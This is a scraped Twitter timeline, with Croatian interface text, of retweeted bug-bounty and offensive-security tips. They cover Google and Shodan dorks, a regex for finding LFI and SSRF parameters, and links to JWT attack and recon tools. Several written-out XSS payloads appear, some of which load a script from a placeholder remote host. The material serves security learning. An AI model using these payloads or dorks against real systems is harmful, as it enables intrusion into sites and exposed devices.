Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
Blokirali ste korisnika/cu @M0sabMusi0
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @M0sabMusi0
-
Don't be script kiddie proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Don't be script kiddie proslijedio/la je Tweet
Some of my favourite Google dorks: inurl:aspx "search" Take some from: https://www.exploit-db.com/google-hacking-database … Then adding 'inurl:gov' can show some interesting results too.
#osintcurious#OSINTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
CTF Docker collection https://hub.docker.com/u/ctftraining
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
[
#OSINT] [1/n] I encountered child porn in a telegram channel. Here's how I found the admin - Went through group history, found 2 interesting links - Link #1 - A TG channel for android wallpapers - Link #2 - WhatsApp group invite for a group dedicated to looting Amazon dealspic.twitter.com/D9g6SRLPWAPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
[2/2] - Recon should be automated as much as it can be. Meanwhile, you can read their product/API docs, mess around - Make a checklist of components such as their session management, their checkout mechanism. Never use a vulnerability checklist unless its component based. - Hack
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
My Methodology, an overview [1/2] - Use the product, see what it has to offer, note down the components that seem interesting - Take your time doing recon, don't rush. Find everything from the subdomains to what technologies they use from their job posting page.
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
I M P O R T A N T This is a collection of nearly all known attack techniques against JWT. It also includes a tool to automate all checks and even a JWT primer.https://github.com/ticarpi/jwt_tool/wiki#menu …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
This technique is so useful, especially with race conditions
"send the whole of every request except the last byte, then, when they're all ready, 'release' each request by sending the last byte."
Kudos to @albinowax for his streak of awesome work.https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je TweetPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Don't be script kiddie proslijedio/la je Tweet
Shodan Cheat Sheet hostname:http://example.com title:"webcam login" net:13.227.143.0/24 os:"windows xp" port:80 city:tokyo org:microsoft country:IN (use abbreviations such US and NZ) has_screenshot:true (only returns results that have a screenshot available
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
Quick and dirty way to find parameters vulnerable to LFI & Path Traversal & SSRF & Open Redirect: Burp Search > Regex \?.*=(\/\/?\w+|\w+\/|\w+(%3A|:)(\/|%2F)|%2F|[\.\w]+\.\w{2,4}[^\w]) Suggestions are welcome.pic.twitter.com/E0nEDFeUaM
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
See-SURF: Python based scanner to find potential SSRF parametershttps://github.com/In3tinct/See-SURF …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
Here some RCE reports You should read https://hackerone.com/reports/591295 https://hackerone.com/reports/296991 https://hackerone.com/reports/470637 https://hackerone.com/reports/430463 https://hackerone.com/reports/502758 https://hackerone.com/reports/423541 https://hackerone.com/reports/510887 https://hackerone.com/reports/538771 https://hackerone.com/reports/460545
#bugbounty#bugbountytipsHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
New little recon tool - Automate the usage of MassDNS, Masscan, and nmap to filter out unreachable hosts + generate prepared lists of live URLs, IPs, domains, and services for further targeting.
#bugbountytoolshttps://github.com/allyomalley/LiveTargetsFinder/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
Arjun : HTTP parameter discovery suite (Typical scan takes 30 sec with huge list of 25,980 param' names) : https://github.com/s0md3v/Arjun cc
@s0md3vpic.twitter.com/u1uwFxPVqj
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
-Intelligence Gathering.pdf: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/5-part-100-article/new/Infrastructure%20PenTest%20Series%20:%20Part%201%20-%20Intelligence%20Gathering.pdf … -Vulnerability Analysis.pdf: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/5-part-100-article/new/Infrastructure%20PenTest%20Series%20:%20Part%202%20-%20Vulnerability%20Analysis.pdf … -Post Exploitation.pdf: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/2-part-100-article/new_articles/Infrastructure%20PenTest%20Series%20_%20Part%204%20-%20Post%20Exploitation.pdf … -
#bugbountytip.pdf: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/3-part-100-article/hacking/%23bugbountytip.pdf … -Practical recon techniques.pdf: https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/7-part-100-article/Practical%20recon%20techniques%20for%20bug%20hunters%20&%20pen%20testers.pdf …#infosec#PenTest#OSINTHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Don't be script kiddie proslijedio/la je Tweet
All script-based
#XSS vectors. (HTML, no events) <script>alert(1)// <script>alert(1)<!-- <script>alert(1)%0A--> <script src=data:,alert(1)> <script src=//HOST/FILE> <script src=https:DOMAIN/FILE> <svg><script xlink:href=//HOST/FILE> <svg><script xlink:href=https:DOMAIN/FILE>Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
<scRiPt/
<iMg="><">/*</sCRipt*<srC= */(prompt)``</ScripTpic.twitter.com/ym4O7ypeMGHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Don't be script kiddie proslijedio/la je Tweet
XSS classification model - Types of Cross-Site Scripting https://noraj.github.io/XSS-classification-model/ …
#XSSpic.twitter.com/foYvFkGonH
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.